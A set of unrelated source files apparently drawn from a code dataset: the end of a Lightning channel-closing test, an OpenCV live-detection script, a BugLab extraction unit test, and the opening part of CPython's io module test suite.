fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
fut.result(TIMEOUT)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
# Works when l2 closes channel, too.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 1000000, False)
l2.rpc.close(l1.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
# Figure out what address it will try to use.
keyidx = int(l1.db_query("SELECT intval FROM vars WHERE name='bip32_max_index';")[0]['intval'])
# Expect 1 for change address, 1 for the channel final address,
# which are discarded as the 'scratch' tx that the fundchannel
# plugin makes, plus 1 for the funding address of the actual
# funding tx.
addr = l1.rpc.call('dev-listaddrs', [keyidx + 3])['addresses'][-1]
# Now, if we specify upfront and it's OK, all good.
l1.stop()
# We need to prepend the segwit version (0) and push opcode (14).
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = '0014' + addr['bech32_redeemscript']
l1.start()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 1000000)
l1.rpc.close(l2.info['id'])
wait_for(lambda: sorted([c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']]) == ['CLOSINGD_COMPLETE', 'ONCHAIN', 'ONCHAIN'])
|
live_detection.py
|
import cv2
import time
import queue
import threading
from detector_lowres import Detector
class VideoCapture:
"""
bufferless VideoCapture
"""
def __init__(self, name, width=1920, height=1080):
self.cap = cv2.VideoCapture(name)
if not self.cap.isOpened():
print("Cannot open camera")
return
width_set = self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, float(width))
height_set = self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, float(height))
if not (width_set and height_set):
print("Set resolution failed")
print("Resolution: {}x{}".format(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH),
self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)))
self.q = queue.Queue()
self._stop = False
self.t = threading.Thread(target=self._reader)
self.t.daemon = True
self.t.start()
# read frames as soon as they are available, keeping only most recent one
def _reader(self):
while not self._stop:
ret, img = self.cap.read()
if not ret:
break
if not self.q.empty():
try:
self.q.get_nowait() # discard previous (unprocessed) frame
except queue.Empty:
pass
self.q.put(img)
def read(self):
return self.q.get()
def close(self):
self._stop = True
time.sleep(.25)
self.cap.release()
if __name__ == "__main__":
d = Detector()
cap = VideoCapture(4)
while True:
frame = cap.read()
frame = d.detect(frame)
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
cv2.imshow("frame", frame)
if chr(cv2.waitKey(5) & 0xFF) == 'q':
break
cap.close()
|
test_extraction.py
|
import json
import unittest
from pathlib import Path
from threading import Thread
from typing import Any, List, Tuple, Type
import jedi
import libcst as cst
from jedi.api.environment import Environment
from buglab.controllers.buggydatacreation import extract_bugs_from
from buglab.controllers.helper.randombugselectorserver import random_bug_selector_server
from buglab.representations.coderelations import compute_all_relations
from buglab.representations.codereprs import PythonCodeRelations
from buglab.rewriting import ALL_REWRITE_SCOUTS, filter_ops_in_range
from buglab.rewriting.rewriteops import AbstractRewriteOp
from buglab.rewriting.rewritescouts import ICodeRewriteScout
from buglab.utils.cstutils import AllFunctionFinder
from tests.utils import get_all_files_for_package, iterate_buglab_test_snippets
class TestExtraction(unittest.TestCase):
"""Download a friendly package and run
representation extraction on that package_name."""
def _try_serialize_all(self, filepath: str, jedi_env: Environment):
print(filepath)
with open(filepath) as f:
code_text = f.read()
rel_db = PythonCodeRelations(code_text, Path(filepath))
compute_all_relations(rel_db, jedi_env)
function_finder = AllFunctionFinder()
rel_db.ast_with_metadata_wrapper.visit(function_finder)
available_ops: List[AbstractRewriteOp] = []
available_ops_metadata: List[Tuple[Type[ICodeRewriteScout], cst.CSTNode, Any]] = []
rel_db.ast_with_metadata_wrapper.visit_batched([ScoutClass(available_ops) for ScoutClass in ALL_REWRITE_SCOUTS])
for function, fn_pos in function_finder.all_function_nodes:
relevant_ops, relevant_op_metadata = filter_ops_in_range(available_ops, available_ops_metadata, fn_pos)
serializable, _ = rel_db.as_serializable(
target_range=fn_pos, reference_nodes=[node for _, node, _ in relevant_op_metadata]
)
_ = json.dumps(serializable)
self.__assert_tokens_are_fully_connected(serializable["edges"]["NextToken"])
def __assert_tokens_are_fully_connected(self, token_edges):
next_token_edges = {f: t for f, t in token_edges}
first_token = set(next_token_edges.keys()) - set(next_token_edges.values())
self.assertEqual(len(first_token), 1, "The token sequence is disconnected.")
def test_extraction_on_dpu_utils(self):
for filepath, env in get_all_files_for_package("dpu-utils"):
with self.subTest(f"Extracting on {filepath}", path=filepath):
print(filepath)
self._try_serialize_all(filepath, env)
def test_extraction_on_azure_blob_storage(self):
for filepath, env in get_all_files_for_package("azure-storage-blob"):
with self.subTest(f"Extracting on {filepath}", path=filepath):
print(filepath)
self._try_serialize_all(filepath, env)
def test_extraction_on_test_snippets(self):
env = jedi.get_default_environment()
for filepath in iterate_buglab_test_snippets():
with self.subTest(f"Extracting on {filepath}", path=filepath):
print(filepath)
self._try_serialize_all(filepath, env)
def test_random_extraction_on_test_snippets(self):
env = jedi.get_default_environment()
rewrite_selector_server_port: str = "8345"
server_thread = Thread(
target=lambda: random_bug_selector_server("tcp://*:" + rewrite_selector_server_port), daemon=True
)
server_thread.start()
for filepath in iterate_buglab_test_snippets():
with self.subTest(f"Extracting on {filepath}", path=filepath):
all_p = extract_bugs_from(
filepath, env.path, "testsnippets", "0", "tcp://localhost:" + rewrite_selector_server_port
)
for extracted_fn in all_p:
for extracted_e, _ in extracted_fn["rewrites"].values():
self.__assert_tokens_are_fully_connected(extracted_e["graph"]["edges"]["NextToken"])
if __name__ == "__main__":
unittest.main()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import (
assert_python_ok, assert_python_failure, run_python_until_end)
from test.support import import_helper
from test.support import os_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support import skip_if_sanitizer
from test.support.os_helper import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
requires_alarm = unittest.skipUnless(
hasattr(signal, "alarm"), "test requires signal.alarm()"
)
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
os_helper.unlink(os_helper.TESTFN)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb") as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w', encoding="utf-8")
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w', encoding="utf-8")
def test_raw_file_io(self):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(os_helper.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(os_helper.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(os_helper.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "a", encoding="utf-8") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with warnings_helper.check_warnings(('', ResourceWarning)):
f = MyFileIO(os_helper.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(os_helper.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'w',
encoding="utf-8", closefd=False)
def test_read_closed(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("egg\n")
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
file = self.open(f.fileno(), "r", encoding="utf-8", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(os_helper.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, os_helper.TESTFN, "r",
encoding="utf-8", closefd=False)
def test_closefd_attr(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", encoding="utf-8", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with warnings_helper.check_warnings(('', ResourceWarning)):
f = self.FileIO(os_helper.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(os_helper.TESTFN, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(os_helper.TESTFN, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(os_helper.TESTFN, 'w', encoding="utf-8")
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', encoding="utf-8")
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', encoding="utf-8", closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("egg\n")
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", encoding="utf-8", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
